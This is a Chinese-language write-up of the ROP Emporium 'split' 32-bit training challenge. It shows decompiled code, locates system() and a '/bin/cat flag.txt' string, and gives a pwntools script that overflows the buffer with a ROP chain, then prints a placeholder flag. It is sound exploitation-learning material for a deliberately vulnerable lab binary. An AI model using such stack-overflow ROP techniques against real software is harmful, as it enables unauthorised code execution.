ROP split
文件:split32
checksec split32
Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000)
IDA
int __cdecl main(int argc, const char **argv, const char **envp) { setvbuf(stdout, 0, 2, 0); setvbuf(stderr, 0, 2, 0); puts("split by ROP Emporium"); puts("32bits\n"); pwnme(); puts("\nExiting"); return 0; }
进入pwnme();
char *pwnme() { char s; // [sp+0h] [bp-28h]@1 memset(&s, 0, 0x20u); puts("Contriving a reason to ask user for data..."); printf("> "); return fgets(&s, 96, stdin); }
此处两种求偏移量的方法。一种是直接看0x28+4=44,另一种如同ret2win,用cytlic溢出求得44。
shift+F12
.rodata:080486F0 00000016 C split by ROP Emporium .rodata:08048706 00000008 C 32bits\n .rodata:0804870E 00000009 C \nExiting .rodata:08048718 0000002C C Contriving a reason to ask user for data... .rodata:08048747 00000008 C /bin/ls .eh_frame:080487C3 00000007 C ;*2$\"( .data:0804A030 00000012 C /bin/cat flag.txt
发现
/bin/ls
和/bin/cat flag.txt
点击进入usefulFunction(哇,看了wp才知道有这个!以后要好好浏览一遍IDA的function name)
int usefulFunction() { return system("/bin/ls"); }
如果是system(“
/bin/cat flag.txt
“)就可以直接出flag吧。需要压入 偏移量+call
system
的地址+/bin/cat flag.txt
地址system
地址(使劲找,找到call system(调用system).text:08048657 call _system
/bin/cat flag.txt
地址shift+F12,很容易找到。
.data:0804A030 usefulString db '/bin/cat flag.txt',0
设置context.log_level=”debug”
脚本在执行时就会输出debug的信息,你可以通过观察这些信息查找哪步出错了EXP(又回头研究了一会pwntools的书写(嘻))
from pwn import * p = process("./split32") system = 0x08048430 catflag = 0x0804a030 payload = "\x00"*44 + p32(system) + p32(0) + p32(catflag) p.sendlineafter("> ",payload) print(p.recv()) p.interactive()
得到:
lxl@lxl-vm:~/rop/split/split32$ python split32.py [+] Starting local process './split32': pid 2874 ROPE{a_placeholder_32byte_flag!} [*] Switching to interactive mode [*] Got EOF while reading in interactive $
ROPE{a_placeholder_32byte_flag!}